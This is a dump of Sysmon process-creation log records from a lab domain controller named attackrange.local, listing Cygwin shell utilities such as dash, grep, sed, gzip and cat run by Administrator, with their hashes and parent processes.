14:55:56.355{A8622C2F-53FC-6078-A609-00000000AE01}6748C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-A309-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050199Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.355{A8622C2F-53FC-6078-A509-00000000AE01}4056C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.348{A8622C2F-53FC-6078-A309-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050179Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.348{A8622C2F-53FC-6078-A409-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-A209-00000000AE01}7016C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.341{A8622C2F-53FC-6078-A209-00000000AE01}7016C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.333{A8622C2F-53FC-6078-A109-00000000AE01}4288C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-A009-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.326{A8622C2F-53FC-6078-A009-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.318{A8622C2F-53FC-6078-9F09-00000000AE01}1408C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-9D09-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.310{A8622C2F-53FC-6078-9E09-00000000AE01}6808C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-9B09-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.310{A8622C2F-53FC-6078-9D09-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050094Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.303{A8622C2F-53FC-6078-9C09-00000000AE01}3208C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-9A09-00000000AE01}6968C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.303{A8622C2F-53FC-6078-9B09-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.296{A8622C2F-53FC-6078-9A09-00000000AE01}6968C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.288{A8622C2F-53FC-6078-9909-00000000AE01}1476C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-9809-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050059Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.281{A8622C2F-53FC-6078-9809-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.273{A8622C2F-53FC-6078-9709-00000000AE01}4832C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-9509-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.266{A8622C2F-53FC-6078-9609-00000000AE01}5620C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-9309-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050027Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.265{A8622C2F-53FC-6078-9509-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.258{A8622C2F-53FC-6078-9409-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-9209-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.258{A8622C2F-53FC-6078-9309-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.251{A8622C2F-53FC-6078-9209-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.244{A8622C2F-53FC-6078-9109-00000000AE01}3304C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-9009-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.237{A8622C2F-53FC-6078-9009-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.228{A8622C2F-53FC-6078-8F09-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-8D09-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.221{A8622C2F-53FC-6078-8E09-00000000AE01}4364C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-8B09-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.221{A8622C2F-53FC-6078-8D09-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049922Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.214{A8622C2F-53FC-6078-8C09-00000000AE01}5312C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-8A09-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.214{A8622C2F-53FC-6078-8B09-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.207{A8622C2F-53FC-6078-8A09-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.199{A8622C2F-53FC-6078-8909-00000000AE01}5996C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-8809-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049887Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.192{A8622C2F-53FC-6078-8809-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:56.184{A8622C2F-53FC-6078-8709-00000000AE01}5852C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-8509-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.176{A8622C2F-53FC-6078-8609-00000000AE01}4604C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-8309-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.176{A8622C2F-53FC-6078-8509-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049837Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.759{A8622C2F-53FB-6078-3C09-00000000AE01}6084C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-3A09-00000000AE01}6652C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049053Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.759{A8622C2F-53FB-6078-3B09-00000000AE01}2952C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049041Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.752{A8622C2F-53FB-6078-3A09-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.744{A8622C2F-53FB-6078-3909-00000000AE01}3368C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-3809-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049019Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.737{A8622C2F-53FB-6078-3809-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049006Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.729{A8622C2F-53FB-6078-3709-00000000AE01}6456C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-3509-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048987Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.721{A8622C2F-53FB-6078-3609-00000000AE01}1476C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-3309-00000000AE01}5620C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.721{A8622C2F-53FB-6078-3509-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048967Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 